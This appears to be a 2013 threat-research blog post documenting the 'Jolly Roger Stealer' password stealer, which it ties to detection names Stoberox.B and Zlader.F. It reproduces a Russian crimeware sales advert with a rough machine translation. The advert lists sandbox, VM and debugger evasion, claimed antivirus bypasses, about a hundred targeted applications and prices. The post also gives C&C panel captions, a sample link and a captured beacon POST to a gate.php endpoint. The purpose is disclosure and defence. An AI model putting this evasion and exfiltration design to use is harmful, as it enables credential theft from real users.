2013-10-20 - Connect the dots
Jolly Roger Stealer - Stoberox.B(?)/Zlader.F
 |
| Piece of Jolly Roger Stealer Advert |
Original Text of the Advert
------------------------------------------
Jolly Roger Stealer - обновленная система сбора па, Стилер пассов с функционалом лоадера
Доброго времени суток, уважаемое black-hat сообщество!
Предлагаю вашему вниманию систему по сбору паролей "Jolly Roger Stealer".
Система представляет собой тихий нерезидентный софт, похищающий пароли пользователя от различных ресурсов и отправляющий их на сервер.
Технические характеристики:
- Малый размер (вес ~37 кб некриптованный и непакованный)
- Не выбрасывает из себя никаких DLL/файлов, не используются сторонние библиотеки, файлы и тд.
- Стабильная работа в Windows XP/2003/Vista/7/8 (x32/x64)
- Работа в любых учетных записях (UAC - on/off ; admin/user/guest)
- Нет оповещений от UAC (Vista/7) и службы безопасности системы
- Динамический импорт части API функций по хешам от их имен
- Некое подобие антиэмуляции (насколько это возможно в Ring3)
- Антиотладка (обнаружение активной ринг3 отладки)
- Не содержит в себе статичных текстовых строк (данные генерируются в риал-тайме)
- Шифрование передаваемых данных
- Совместим с любыми крипторами/пакерами/протекторами
(не используются сторонние библиотеки, файлы и тд. стандартный ЕХЕ файл без TLS, EOF, etc.)
- Детект присутствия Sandbox'ов и некоторых проактивных защит
(при их обнаружении бот прекращает свое выполнение и безопасно самоудаляется)
Детектируемые SandBox'ы:
+ JoeBox (3 variants)
+ SandboxIE
+ SunBelt (3 variants)
+ ThreadExpert (2 variants)
+ Sandbox (1,2)
+ Norman SandBox
+ Anubis (2 variants)
+ CWSandbox
Детектируемые виртуальные машины:
+ Virtual PC
+ VirtualBox
+ VMware
+ Parallels Workstation
+ QEMU
Детектируемые снифферы:
+ Wireshark
Детектируемые Ring3 / Ring0 отладчики:
+ OllyDBG
+ Immunity Debugger
+ WinDbg
+ W32DAsm
+ IDA
+ SoftICE
+ Syser
+ TRW
+ TWX
- Обход фаерволов и проактивных защит путем инжекта Payload'a в доверенный процесс (настройки по умолчанию)
Тесты производились на следующих продуктах с последними обновлениями:
AVG Internet Security 2012 - обходит
Avira Premium Security Suite 10.0.0.608 - обходит
BitDefender Internet Security 2012 - обходит
F-Secure Internet Security 2011 - обходит
Jetico Personal Firewall 2010 - обходит
Norton Internet Security 2012 - обходит
Sunbelt Personal Firewall 4.6.1861.0 - обходит
G Data InternetSecurity 2012 - обходит
Trend Micro Titanium Internet Security 2012 - обходит
Dr.Web Security Space Pro 7 - обходит
ESET NOD32 Smart Security 5 - обходит
Panda Internet Security 2012 - обходит
Malware Defender 2.7.3.0002 - обходит
Kaspersky Internet Security 2012 - обходит
В некоторых случаях необходим хороший крипт! (пример - KIS 2012)
- Детект проблемных продуктов защиты, которые данный код категорически не в силах
oбойти и самоудаление в случае их обнаружения
- Поддержка получения и расшифровки паролей от следующих программ (актуальных последних версий):
+ FAR Manager
+ Total Commander
+ WS_FTP
+ CuteFTP
+ FlashFXP
+ FileZilla
+ FTP Commander
+ BulletProof FTP
+ SmartFTP
+ TurboFTP
+ FFFTP
+ CoffeeCup FTP
+ CoreFTP
+ FTP Explorer
+ Frigate3 FTP
+ SecureFX
+ UltraFXP
+ FTPRush
+ WebSitePublisher
+ BitKinex
+ ExpanDrive
+ ClassicFTP
+ Fling
+ SoftX
+ Directory Opus
+ FreeFTP
+ DirectFTP
+ LeapFTP
+ WinSCP
+ 32bit FTP
+ NetDrive
+ WebDrive
+ FTP Control
+ Opera
+ WiseFTP
+ FTP Voyager
+ Firefox
+ FireFTP
+ SeaMonkey
+ Flock
+ Mozilla Suite Browser
+ LeechFTP
+ Odin Secure FTP Expert
+ WinFTP
+ FTP Surfer
+ FTPGetter
+ ALFTP
+ Internet Explorer
+ Dreamweaver
+ DeluxeFTP
+ Google Chrome
+ Chromium
+ SRWare Iron
+ ChromePlus
+ Bromium
+ Nichrome
+ Comodo Dragon
+ RockMelt
+ K-Meleon
+ Epic
+ Staff-FTP
+ AceFTP
+ Global Downloader
+ FreshFTP
+ BlazeFTP
+ NETFile
+ GoFTP
+ 3D-FTP
+ Easy FTP
+ Xftp
+ FTP Now
+ Robo-FTP
+ LinasFTP
+ Cyberduck
+ Putty
+ Notepad++ (NppFTP)
+ CoffeeCup Visual Site Designer
+ CoffeeCup Sitemapper
+ FTPShell
+ FTPInfo
+ NexusFile
+ FastStone Browser
+ CoolNovo
+ WinZip
+ Yandex.Internet
+ MyFTP
+ sherrod FTP
+ NovaFTP
+ Windows Mail
+ Windows Live Mail
+ Pocomail
+ Becky!
+ IncrediMail
+ The Bat!
+ Outlook
+ Thunderbird
+ FastTrackFTP
Скриншоты:
http://i019.radikal.ru/1308/91/598ac0e5c9b4.png
http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png
[redacted - thx Denis](апдейт от 03.10.13)
Также присутствует функционал лоадера:
+ Неограниченное количество заданий на закачку файлов
+ Размер файлов не ограничен
+ Возможность разделения заданий по странам, а также указание лимита загрузок
+ В случае неудачного запуска загруженного файла он будет удален
+ Проверка файла на PE перед запуском (стартуем только исполняемые файлы)
+ Удобное управление заданиями и статистика в админ-панели
+ Все данные по заданиям и репортам подвергаются 2х-уровневому шифрованию в оба направления (админка <-> бот)
http://s020.radikal.ru/i713/1310/de/752434b61d42.png
http://i016.radikal.ru/1310/59/5125d395c417.png
+ В админку добавлен парсер для выборки нужных акков
http://s020.radikal.ru/i717/1310/21/20c97535bd51.png
Прайс: билд = 500$
ребилд = 30$
ONLY PERFECTMONEY!
Контакты: [email protected]
------------------------------------------
Translated by google as:
------------------------------------------
Jolly Roger Stealer - updated collection system pas Steeler passes with a functional loader
Good day, dear black-hat community!
I offer you a system to collect passwords "Jolly Roger Stealer".
The system is a quiet resident software that steals user passwords from a variety of resources and sending them to the server .
Specifications:
- Small size (weight ~ 37 kb nekriptovanny and nepakovanny )
- Do not throw yourself out of any DLL / file does not use third-party libraries , files, and so on.
- Stable work in Windows XP/2003/Vista/7/8 (x32/x64)
- Work in any account (UAC - on / off; admin / user / guest)
- No alerts from UAC (Vista / 7) and the security of the system
- Dynamic imports of API functions for hashes of their names
- A sort of anti-emulation techniques (as far as possible in the Ring3)
- Anti debugging (finding active ring3 debugging)
- Does not contain static text strings (the data generated in the half - rial )
- Encryption of data transmitted
- Compatible with any kriptore / packers / protectors
( do not use third-party libraries , files, and so on. standard EXE file without TLS, EOF, etc.)
- Detect the presence Sandbox'ov and some proactive protection
( if they are detected bot stops its execution and safely deletes itself )
Detectable SandBox'y :
+ JoeBox ( 3 variants)
+ SandboxIE
+ SunBelt ( 3 variants)
+ ThreadExpert ( 2 variants)
+ Sandbox (1,2)
+ Norman SandBox
+ Anubis ( 2 variants)
+ CWSandbox
Detectable virtual machines :
+ Virtual PC
+ VirtualBox
+ VMware
+ Parallels Workstation
+ QEMU
Detectable sniffers :
+ Wireshark
Detectable Ring3 / Ring0 debuggers :
+ OllyDBG
+ Immunity Debugger
+ WinDbg
+ W32DAsm
+ IDA
+ SoftICE
+ Syser
+ TRW
+ TWX
- Bypass firewalls and proactive protection by inzhekta Payload'a into a trusted process ( the default setting )
Tests were carried out on the following products with the latest updates :
AVG Internet Security 2012 - bypasses
Avira Premium Security Suite 10.0.0.608 - bypasses
BitDefender Internet Security 2012 - bypasses
F-Secure Internet Security 2011 - bypasses
Jetico Personal Firewall 2010 - bypasses
Norton Internet Security 2012 - bypasses
Sunbelt Personal Firewall 4.6.1861.0 - bypasses
G Data InternetSecurity 2012 - bypasses
Trend Micro Titanium Internet Security 2012 - bypasses
Dr.Web Security Space Pro 7 - bypasses
ESET NOD32 Smart Security 5 - bypasses
Panda Internet Security 2012 - bypasses
Malware Defender 2.7.3.0002 - bypasses
Kaspersky Internet Security 2012 - bypasses
In some cases, a good crypt ! (Example - KIS 2012)
- Detect the problem of security products that this code can not categorically
oboyti samoudalenie and when found
- Support for receiving and decrypting passwords of the following programs ( current latest version ) :
+ FAR Manager
+ Total Commander
+ WS_FTP
+ CuteFTP
+ FlashFXP
+ FileZilla
+ FTP Commander
+ BulletProof FTP
+ SmartFTP
+ TurboFTP
+ FFFTP
+ CoffeeCup FTP
+ CoreFTP
+ FTP Explorer
+ Frigate3 FTP
+ SecureFX
+ UltraFXP
+ FTPRush
+ WebSitePublisher
+ BitKinex
+ ExpanDrive
+ ClassicFTP
+ Fling
+ SoftX
+ Directory Opus
+ FreeFTP
+ DirectFTP
+ LeapFTP
+ WinSCP
+ 32bit FTP
+ NetDrive
+ WebDrive
+ FTP Control
+ Opera
+ WiseFTP
+ FTP Voyager
+ Firefox
+ FireFTP
+ SeaMonkey
+ Flock
+ Mozilla Suite Browser
+ LeechFTP
+ Odin Secure FTP Expert
+ WinFTP
+ FTP Surfer
+ FTPGetter
+ ALFTP
+ Internet Explorer
+ Dreamweaver
+ DeluxeFTP
+ Google Chrome
+ Chromium
+ SRWare Iron
+ ChromePlus
+ Bromium
+ Nichrome
+ Comodo Dragon
+ RockMelt
+ K-Meleon
+ Epic
+ Staff-FTP
+ AceFTP
+ Global Downloader
+ FreshFTP
+ BlazeFTP
+ NETFile
+ GoFTP
+ 3D-FTP
+ Easy FTP
+ Xftp
+ FTP Now
+ Robo-FTP
+ LinasFTP
+ Cyberduck
+ Putty
+ Notepad + + (NppFTP)
+ CoffeeCup Visual Site Designer
+ CoffeeCup Sitemapper
+ FTPShell
+ FTPInfo
+ NexusFile
+ FastStone Browser
+ CoolNovo
+ WinZip
+ Yandex.Internet
+ MyFTP
+ Sherrod FTP
+ NovaFTP
+ Windows Mail
+ Windows Live Mail
+ Pocomail
+ Becky!
+ IncrediMail
+ The Bat!
+ Outlook
+ Thunderbird
+ FastTrackFTP
Screenshots:
http://i019.radikal.ru/1308/91/598ac0e5c9b4.png
http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png
( update on 3/10/13 )
Also there is a functional loader :
+ Unlimited number of tasks to download the file
+ File size is unlimited
+ Possibility to divide tasks across countries, as well as an indication limit of downloads
+ In case of an unsuccessful launch the downloaded file, it will be removed
+ Check the file to PE before starting ( we start only executables )
+ Easy task management and statistics in the admin panel
+ All data on assignments and report are 2- tier encryption in both directions ( admin page <- > bot )
http://s020.radikal.ru/i713/1310/de/752434b61d42.png
http://i016.radikal.ru/1310/59/5125d395c417.png
[redacted - thx Denis]
+ Parser added to the admin panel to select the desired akkov
http://s020.radikal.ru/i717/1310/21/20c97535bd51.png
Price : build = $ 500
Rebuild = $ 30
ONLY PERFECTMONEY!
Contact : [email protected]
------------------------------------------
Note price has moved to :
билд = 350$
ребилд = 15$
on 2013-10-17
It seems Microsoft name the sample associated to this panel : Stoberox.B (but i wonder if it's related to other samples named Stoberox by Microsoft)
Eset name it : Zlader.F
Login Screen :
 |
| Stoberox C&C - Login Screen |
Here is how it looks inside :
 |
| Stoberox C&C - Bots Statistic |
 |
| Stoberox C&C - Logs |
 |
| Email Lists |
 |
| Stoberox C&C - Logs Search |
 |
| Stoberox C&C - Create Tasks |
 |
| Storebox - Tasks Statistic |
"pony + админка spyeye ? " - GrandSoft
<edit 2hours after post: Fixed typo : Zlader != Zlater />
Sample: Here (OwnCloud)
C&C call:
81.177.141.211 POST /jr2/gate.php HTTP/1.0
8342 | 81.177.128.0/18 | RTCOMM | RU | JINO.RU | AVGURO TECHNOLOGIES LTD. HOSTING SERVICE PROVIDER
Host: esco.myjino.ru
Accept: */*
Accept-Encoding: none
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 196
81.177.141.211 POST /jr2/gate.php HTTP/1.0
8342 | 81.177.128.0/18 | RTCOMM | RU | JINO.RU | AVGURO TECHNOLOGIES LTD. HOSTING SERVICE PROVIDER
Host: esco.myjino.ru
Accept: */*
Accept-Encoding: none
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 196